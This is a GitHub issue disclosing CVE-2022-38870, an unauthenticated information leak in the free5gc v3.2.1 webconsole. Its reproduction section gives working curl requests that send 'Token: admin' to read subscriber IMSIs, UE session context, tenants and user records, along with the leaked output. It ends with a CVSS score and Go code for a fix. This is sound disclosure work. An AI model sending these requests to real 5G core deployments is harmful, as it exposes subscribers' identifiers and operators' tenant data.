Headline
CVE-2022-38870: [Bugs] Leaking Registered UEs,Subscriber information,Tenants and User via the Free5gc webconsole without authentication · Issue #387 · free5gc/free5gc
Free5gc v3.2.1 is vulnerable to Information disclosure.
Bug Description
The free5gc webconsole ships with a default username, admin. Sending that username as the value of the Token header, with no password or any other authentication, is enough to leak all of the information below:
- Registered UEs (plmnID, ueId)
- Subscriber information (AccessType, CmState, Guti, Mcc, Mnc, Dnn, PduSessionId, Sd, SmContextRef, Sst, Supi, Tac)
- Tenants and users
Steps To Reproduce
Leaking the subscriber list:
$ curl 'http://172.27.65.183:30500/api/subscriber' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://172.27.65.183:30500/' -H 'Connection: keep-alive' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache'
[{"plmnID":"20893","ueId":"imsi-208930000000003"}]
Using the gathered IMSI to get the registered UE info:
$ curl 'http://172.27.65.183:30500/api/registered-ue-context/imsi-208930000000003' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/'
[{"AccessType":"3GPP_ACCESS","CmState":"IDLE","Guti":"20893cafe0000000014","Mcc":"208","Mnc":"93","PduSessions":[{"Dnn":"internet","PduSessionId":"1","Sd":"010203","SmContextRef":"urn:uuid:d303dc78-b85a-4071-9e47-1e86e94b1773","Sst":"1"}],"Supi":"imsi-208930000000003","Tac":"000001"}]
Leaking tenant information:
$ curl 'http://172.27.65.183:30500/api/tenant' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/'
[{"tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","tenantName":"test"}]
Using the gathered tenant id to get the user information for a specific tenant:
$ curl 'http://172.27.65.183:30500/api/tenant/95e76759-cf0b-4c4f-8e93-393db0fbe503/user' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0' -H 'Accept: application/json' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'X-Requested-With: XMLHttpRequest' -H 'Token: admin' -H 'Connection: keep-alive' -H 'Referer: http://172.27.65.183:30500/'
[{"userId":"715d2157-66c9-4885-b57c-48211010e237","tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","email":"[email protected]","encryptedPassword":""}]
Environment:
- free5GC Version: v3.2.1
- OS: Ubuntu 22.04
Risk and Impact
Risk : RISK_INFRASTRUCTURE_INFO_LEAK
Impact: TECH_IMPACT_INFO_DISCLOSURE
* Financial impact: None or not known.
* Confidentiality impact: High. It is possible for an unauthenticated attacker to leak registered UEs (plmnID, ueId), subscriber information (AccessType, CmState, Guti, Mcc, Mnc, Dnn, PduSessionId, Sd, SmContextRef, Sst, Supi, Tac), and tenant and user records.
* Integrity impact: None or not known.
* Availability impact: None or not known.
CVSS Base Score: 7.5
Impact Subscore: 3.6
Exploitability Subscore: 3.9
CVSS Temporal Score: 7.5
CVSS Environmental Score: 7.5
CVSS v3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X)
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X
Proposed Fix:
Consider generating a complex random token per session and giving it an expiration date, so that a fixed value such as the default username is never accepted as a credential.
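As an added illustration of that proposed fix (example code written for this issue, not free5gc's own session handling), the sketch below replaces the fixed-string Token check with a 256-bit random token that is issued only after login, bound to a tenant, and rejected once it expires; TokenStore, Issue and Authorize are hypothetical names.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"time"
)
type session struct {
	tenantID string
	expires  time.Time
}

// TokenStore (a hypothetical type, not free5gc's own) keeps tokens issued after
// a successful login, each bound to a tenant and an expiry. Not goroutine-safe.
type TokenStore struct {
	sessions map[string]session
	ttl      time.Duration
	now      func() time.Time // injectable clock so expiry can be tested
}

func NewTokenStore(ttl time.Duration) *TokenStore {
	return &TokenStore{sessions: map[string]session{}, ttl: ttl, now: time.Now}
}

// Issue returns a fresh 256-bit random token for tenantID; it must only be
// called after the user's password has been verified.
func (s *TokenStore) Issue(tenantID string) (string, error) {
	buf := make([]byte, 32)
	if _, err := rand.Read(buf); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(buf)
	s.sessions[tok] = session{tenantID: tenantID, expires: s.now().Add(s.ttl)}
	return tok, nil
}

// Authorize maps a Token header to its tenant; a fixed string like the default
// username is just an unknown token, and expired entries are deleted on sight.
func (s *TokenStore) Authorize(token string) (string, error) {
	sess, ok := s.sessions[token]
	switch {
	case !ok:
		return "", errors.New("invalid token")
	case !s.now().Before(sess.expires):
		delete(s.sessions, token)
		return "", errors.New("token expired")
	}
	return sess.tenantID, nil
}
```

A request carrying "Token: admin" now fails at Authorize before any subscriber, tenant or user handler runs, and a leaked token stops working once its TTL has passed.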